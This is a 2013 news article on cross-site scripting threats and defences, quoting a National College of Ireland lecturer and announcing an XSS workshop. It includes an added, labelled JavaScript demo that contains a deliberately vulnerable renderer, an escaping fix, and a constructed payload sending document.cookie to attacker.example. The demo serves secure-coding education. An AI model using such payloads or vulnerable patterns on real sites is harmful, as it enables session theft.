XSS hack attacks still represent a serious threat to web apps

16 Aug 2013

Cross-site scripting (XSS) attacks remain one of the most serious threats to web applications, a senior lecturer at the School of Computing at the National College of Ireland told Siliconrepublic.com.

Taken together, cross-site scripting, SQL injection and cross-site request forgery accounted for 40pc of all vulnerability disclosures in 2012, according to the Open Sourced Vulnerability Database (OSVDB).

According to the HP 2012 Cyber Risk report: “In one case, analysis of a multinational corporation showed that just under half (48.32pc) of their web applications were vulnerable to some form of XSS.”

Michael Bradford, a lecturer at the School of Computing at the National College of Ireland, said OSVDB's quarterly breakdown of disclosures by vulnerability type shows that the number of XSS disclosures has fallen from 2012 to the present.

“However, XSS disclosures still outrank disclosures relating to other types of vulnerability.”

Bradford said that there are a number of ways to defend against XSS attacks.

“Most of the main browsers have attempted to implement protection against XSS attacks – so this should offer some protection (unless the newly implemented functionality in the browser becomes susceptible to attack itself).

“Security should also be at the forefront of considerations during the application development process with secure coding practices employed. To prevent stealing of session cookie information, HttpOnly cookies should be used. It is also critical to examine and validate end-user data submitted to web applications.

“If an application accepts HTML-tagged content as input this should be seriously examined. As a rule, all input should be HTML-encoded unless absolutely necessary; and in those exceptional cases great care should be taken to validate the data as being non-malicious in nature,” Bradford said.
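The following is an added example, not code from the article, from Bradford or from NCI's workshop. It puts the two defences he lists side by side in a Node.js-style handler: a reflected-XSS template that writes a query parameter straight into the page (the "before"), the same template with the value HTML-encoded where it is written out, an attribute-context variant, and a Set-Cookie header that marks the session cookie HttpOnly so a successful script injection cannot read it through document.cookie. The payload, session id and user names are constructed for the demo; the Secure and SameSite flags are not mentioned in the article and are added as the flags a practitioner would set alongside HttpOnly.

```javascript
// Added example (not from the Siliconrepublic article or NCI).
// Demonstrates HTML-encoding untrusted data at the point it is written into
// a page, plus an HttpOnly session cookie. All sample data is constructed.

// Every character that can change HTML structure, mapped to its entity.
// Escaping both quote styles makes the output safe inside quoted attribute
// values as well as in text nodes.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable ('before'): reflects the untrusted name into the page unchanged.
// Kept deliberately insecure to show the pattern the article warns about.
function renderGreetingVulnerable(name) {
  return `<p>Hello, ${name}</p>`;
}

// Hardened: identical template, but the untrusted value is encoded exactly
// where it lands in HTML (encode at output, in the HTML text context).
function renderGreetingSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}</p>`;
}

// Attribute context: the surrounding quotes must be present AND the value
// escaped, otherwise a payload like  " onfocus="alert(1)  breaks out.
function renderNameFieldSafe(name) {
  return `<input name="display" value="${escapeHtml(name)}">`;
}

// Session cookie with HttpOnly, so injected script cannot read it via
// document.cookie. Secure and SameSite are added here as good practice;
// the article only mentions HttpOnly.
function sessionCookieHeader(sessionId) {
  // Refuse anything that could smuggle extra attributes into the header.
  if (!/^[A-Za-z0-9_-]+$/.test(sessionId)) {
    throw new Error("session id must be a URL-safe token");
  }
  return `sid=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed cookie-stealing payload of the kind a reflected XSS delivers.
const PAYLOAD =
  "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>";

// Runs the vulnerable and hardened renderers over the same payload and
// reports whether a live <script> tag survived into the output.
function demo() {
  const vulnerable = renderGreetingVulnerable(PAYLOAD);
  const safe = renderGreetingSafe(PAYLOAD);
  return {
    vulnerableHasScript: vulnerable.includes("<script>"),
    safeHasScript: safe.includes("<script>"),
    safe,
    cookie: sessionCookieHeader("8f3c2a9d1e"),
  };
}

console.log(demo());
```

Note that the encoder above is only correct for the HTML text and quoted-attribute contexts; data written into a URL, a JavaScript string or a CSS value needs the encoder for that context, which is the practical reading of "all input should be HTML-encoded". HttpOnly does not stop the script from running; it only denies it the session cookie, so it complements output encoding rather than replacing it.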

Dot Conf deep dive on XSS attacks

On Thursday, 29 August, the National College of Ireland will hold a deep dive session as part of its Dot Conf series focused on XSS hack attacks.

The workshop will look at the key characteristics of an XSS attack, the different types of XSS attack vulnerabilities and measures that can be put in place to mitigate the threat of a web app being susceptible to XSS attacks.

“The workshop will give an overview and describe a number of types of XSS attack vectors. We would also like the attendees to attempt to implement these various XSS attacks against a test website that we have set up.

“This test website has been deployed without implementing any protections against XSS attacks. We plan to end with a Q&A session relating to XSS and web application security,” Bradford added.


John Kennedy is a journalist who served as editor of Silicon Republic for 17 years

editorial@siliconrepublic.com